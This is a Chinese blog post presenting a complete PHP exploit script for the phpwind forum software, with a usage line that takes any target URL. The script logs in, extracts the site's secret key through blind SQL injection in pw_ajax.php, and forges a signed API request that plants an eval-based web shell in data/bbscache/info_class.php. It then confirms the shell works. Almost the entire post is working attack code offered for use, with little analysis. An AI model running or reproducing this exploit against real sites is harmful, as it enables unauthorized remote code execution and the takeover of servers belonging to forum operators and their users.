phpwind漏洞EXP

2010, September 11, 10:14 AM. 漏洞集研
Submitted by admin

命令 :php pking.php user pass http://www.xxxx.com/

pking.php:

 

 

<?php

echo "

Info: Poc for Phpwind远程命令执行

Test: exploit.php user password[/url]

";

 

if($argc<3){

&nbsp; &nbsp; echo "\r\n参数缺少\r\n";

&nbsp; &nbsp; die();

}

$user=$argv[1];

$pass=$argv[2];

$pwurl=$argv[3];

 

$myheader=array(

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;'Accept-Language: zh-cn,zh;q=0.5',

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7',

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;'Referer: [url]http://www.wooyun.org/[/url]',

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;'Connection: Keep-Alive',

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;'Cache-Control: no-cache',

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)'

&nbsp; &nbsp; );

$cookie="";

 

$str=curlsend("$pwurl/login.php?","POST",0,$myheader,"forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC",1);

preg_match_all("/Set-Cookie:([^;]+)/is",$str,$array);

for($i=0;$i<count($array[1]);$i++){

&nbsp; &nbsp; $cookie=$cookie.";".$array[1][$i];

}

 

//echo $cookie;

 

$test = curlsend('$pwurl/pw_ajax.php',"POST",0,$myheader,'',1);

 

if(strpos($test,'<ajax>')) {

&nbsp; &nbsp; die('用户密码或者其他参数错误');

}

 

$shellcode="action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23";

 

$hash="0123456789abcdef";

$craked="";

 

for($i=0;$i<32;$i++){

&nbsp; &nbsp; for($n=0;$n<16;$n++){

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;$tmp=str_replace("{offset}",bin2hex($craked.$hash[$n]),$shellcode);

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;$tmp=curlsend("$pwurl/pw_ajax.php","POST",0,$myheader,$tmp,0);

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;if(strpos($tmp,"pw_config")){

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;echo "CrackEd Offset ".($i+1)." :".$hash[$n]."\r\n";

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;$craked=$craked.$hash[$n];

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;break;

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;}

&nbsp; &nbsp; }

}

 

echo "Craked Magicdata :".$craked."\r\n";

 

echo "Get shell :";

 

//another 0day

$arg='';

$hack = array();

$hack['mode'] = 'Other';

$hack['method'] = 'threadscateGory';

$hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_GET[c]).\'abc";}}}';

$hack['type'] = 'app';

$hack = strips($hack);

ksort($hack);

reset($hack);

foreach ($hack as $key => $value) {

&nbsp; &nbsp; if ($value && $key != 'sig') {

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;$arg .= "$key=$value&";

&nbsp; &nbsp; }

}

 

$arg.='sig='.md5($arg.$craked);

 

echo file_get_contents("$pwurl/pw_api.php?".$arg);

echo "OK\r\n";

 

$str=file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;");

if(strpos($str,'wooyun')){

&nbsp; &nbsp; echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=phpinfo();";

&nbsp; &nbsp; echo "\r\nOver!";

}

 

 

function strips($param) {

&nbsp; &nbsp; if (is_array($param)) {

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;foreach ($param as $key => $value) {

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;$param[$key] = strips($value);

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;}

&nbsp; &nbsp; } else {

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;$param = stripslashes($param);

&nbsp; &nbsp; }

&nbsp; &nbsp; return $param;

}

 

function curlsend($url,$method=false,$ssl=0,$myheader,$data='',$header=0){

global $cookie;

$ch = curl_init();

 

$timeout = 0; // set to zero for no timeout

curl_setopt ($ch, CURLOPT_URL, $url);

curl_setopt ($ch, CURLOPT_POST, $method);

curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

curl_setopt ($ch, CURLOPT_COOKIE, $cookie);

if($data){

curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);

}

curl_setopt ($ch, CURLOPT_HEADER, $header);

if($ssl){

&nbsp; &nbsp; curl_setopt($ch,&nbsp;&nbsp;CURLOPT_SSL_VERIFYPEER,&nbsp;&nbsp;FALSE);

}

 

$handles = curl_exec($ch);

curl_close($ch);

//echo $handles;

return $handles;

 

}

 

data/bbscache/info_class.php 密码c

Tags: phpwind

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):